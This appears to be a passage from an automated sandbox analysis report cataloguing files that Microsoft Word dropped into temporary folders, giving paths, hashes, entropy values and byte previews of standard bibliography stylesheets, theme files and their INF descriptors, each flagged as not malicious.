                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9D98.tmp\gostname.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):255948
                                    Entropy (8bit):5.103631650117028
                                    Encrypted:false
                                    SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                    MD5:9888A214D362470A6189DEFF775BE139
                                    SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                    SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                    SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                    C:\Users\user\AppData\Local\Temp\TCD9DB8.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):302
                                    Entropy (8bit):3.537169234443227
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                    MD5:9C00979164E78E3B890E56BE2DF00666
                                    SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                    SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                    SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9DB8.tmp\iso690nmerical.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):217137
                                    Entropy (8bit):5.068335381017074
                                    Encrypted:false
                                    SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                    MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                    SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                    SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                    SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                    C:\Users\user\AppData\Local\Temp\TCD9E48.tmp\Frame.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):523048
                                    Entropy (8bit):7.715248170753013
                                    Encrypted:false
                                    SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                    MD5:C276F590BB846309A5E30ADC35C502AD
                                    SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                    SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                    SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                    Malicious:false
                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Local\Temp\TCD9E48.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):276
                                    Entropy (8bit):3.5159096381406645
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                    MD5:71CCB69AF8DD9821F463270FB8CBB285
                                    SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                    SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                    SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCD9E59.tmp\View.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):486596
                                    Entropy (8bit):7.668294441507828
                                    Encrypted:false
                                    SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                    MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                    SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                    SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                    SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                    Malicious:false
                                    Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                    C:\Users\user\AppData\Local\Temp\TCD9E59.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):274
                                    Entropy (8bit):3.535303979138867
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                    MD5:35AFE8D8724F3E19EB08274906926A0B
                                    SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                    SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                    SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCD9F19.tmp\Dividend.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):570901
                                    Entropy (8bit):7.674434888248144
                                    Encrypted:false
                                    SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                    MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                    SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                    SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                    SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                    Malicious:false
                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Local\Temp\TCD9F19.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):282
                                    Entropy (8bit):3.5459495297497368
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                    MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                    SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                    SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                    SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCD9F2A.tmp\Basis.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):558035
                                    Entropy (8bit):7.696653383430889
                                    Encrypted:false
                                    SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                    MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                    SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                    SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                    SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                    Malicious:false
                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Local\Temp\TCD9F2A.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):276
                                    Entropy (8bit):3.5361139545278144
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                    MD5:133D126F0DE2CC4B29ECE38194983265
                                    SHA1:D8D701298D7949BE6235493925026ED405290D43
                                    SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                    SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCD9F3A.tmp\Metropolitan.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):777647
                                    Entropy (8bit):7.689662652914981
                                    Encrypted:false
                                    SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                    MD5:B30D2EF0FC261AECE90B62E9C5597379
                                    SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                    SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                    SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                    Malicious:false
                                    Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                    C:\Users\user\AppData\Local\Temp\TCD9F3A.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):290
                                    Entropy (8bit):3.5091498509646044
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                    MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                    SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                    SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                    SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCD9F5C.tmp\Banded.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):562113
                                    Entropy (8bit):7.67409707491542
                                    Encrypted:false
                                    SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                    MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                    SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                    SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                    SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                    Malicious:false
                                    Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Local\Temp\TCD9F5C.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):278
                                    Entropy (8bit):3.535736910133401
                                    Encrypted:false
                                    SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                    MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                    SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                    SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                    SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                    Malicious:false
                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                    C:\Users\user\AppData\Local\Temp\TCD9FAB.tmp\Parcel.thmx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):608122
                                    Entropy (8bit):7.729143855239127
                                    Encrypted:false
                                    SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                    MD5:8BA551EEC497947FC39D1D48EC868B54
                                    SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                    SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                    SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                    Malicious:false
                                    Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....

                                    C:\Users\user\AppData\Local\Temp\TCD9FAB.tmp\content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
